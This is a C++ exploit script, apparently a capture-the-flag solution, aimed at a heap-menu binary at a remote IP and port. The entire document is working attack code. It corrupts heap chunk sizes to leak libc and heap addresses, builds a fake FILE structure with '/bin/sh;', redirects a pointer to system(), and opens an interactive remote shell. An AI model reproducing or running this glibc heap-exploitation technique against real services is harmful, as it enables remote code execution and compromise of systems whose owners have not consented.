```c++
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>

using namespace pwn;
// auto io = Process("./FS-1");
auto io = Remote("13.126.21.122", 49160);

void add(uint32_t idx, uint32_t size, const std::string &data,
         bool fuck = false) {
  io.sendlineafter("Show the order.\n", "1");
  io.sendlineafter("store this order?\n", std::to_string(idx));
  io.sendlineafter("size of the order?\n", std::to_string(size));
  if (fuck == true) {
    return;
  }
  io.sendafter("state the order?\n", data);
}

void edit(uint32_t idx, uint32_t nbytes, const std::string &data) {
  io.sendlineafter("Show the order.\n", "2");
  io.sendlineafter("edit this order?\n", std::to_string(idx));
  io.sendlineafter("new size of the order?\n", std::to_string(nbytes));
  io.sendafter("state the order?\n", data);
}

void rem(uint32_t idx) {
  io.sendlineafter("Show the order.\n", "3");
  io.sendlineafter("order to deliver?\n", std::to_string(idx));
}

std::string show(uint32_t idx) {
  io.sendlineafter("Show the order.\n", "4");
  io.sendlineafter("order to show?\n", std::to_string(idx));
  return io.recvline();
}
int main() {
  ELF exe = ELF("./libc.so.6");
  io.sendafter("name: ", std::string(0x10, 'A'));
  add(0, 0x80, "HKHK");
  add(1, 0x68, "HKHK");
  add(2, 0x58,
      pwn::flat(0x41UL, 0x41UL, 0x41UL, 0x41UL, 0x41UL, 0x31UL, 0x41UL,
                0x41UL));
  edit(0, 0x100, std::string(0x88, 'A') + pwn::p64(0xa1));
  rem(1);
  add(3, 0x68, "HKHK");
  uint64_t libc_leak = pwn::u64(show(2).substr(0, 6) + std::string(2, 0));
  uint64_t libc_base = libc_leak - 0x3c4b78;
  std::cout << "[+] Libc base: 0x" << std::hex << libc_base << std::endl;
  rem(0);
  edit(3, 0x88, std::string(0x68, 'A') + p64(0x31) + "AAAAAAAA");
  auto heap_base = pwn::u64(show(2).substr(8, 6) + std::string(2, 0)) - 0x20;
  std::cout << "[+] Heap base: 0x" << std::hex << heap_base << std::endl;
  add(0, 0x80, "HKHK");
  add(0, 0x28, "HKHK");

  add(0, 0x28, "HKHK");
  add(1, 0x80, "HKHK");
  add(2, 0x38, "HKHK");
  rem(1);
  std::string fake_file;
  fake_file += pwn::flat(1L, 1L, 2L, 1L);
  fake_file += "/bin/sh;";
  fake_file += p64(0x61);
  fake_file += p64(0) + p64((libc_base + 0x3c5520) - 0x10);
  fake_file.resize(0xa0, 0);
  fake_file += p64((heap_base + 0x268) - 0xa0);
  fake_file.resize(0xc0, 0);
  fake_file += p64(heap_base + 0x180);

  std::string payload;
  payload += fake_file;
  payload += p64(0) + p64(0) + p64(heap_base);
  payload += pwn::flat(1L, 2L, 3L, heap_base + 0x288, 0L, 0L);
  payload += p64(libc_base + exe["system"]);
  edit(0, payload.size() + 0x10, payload);
  add(0, 1337, "HKHK", true);
  io.interactive();
  return 0;
}
```
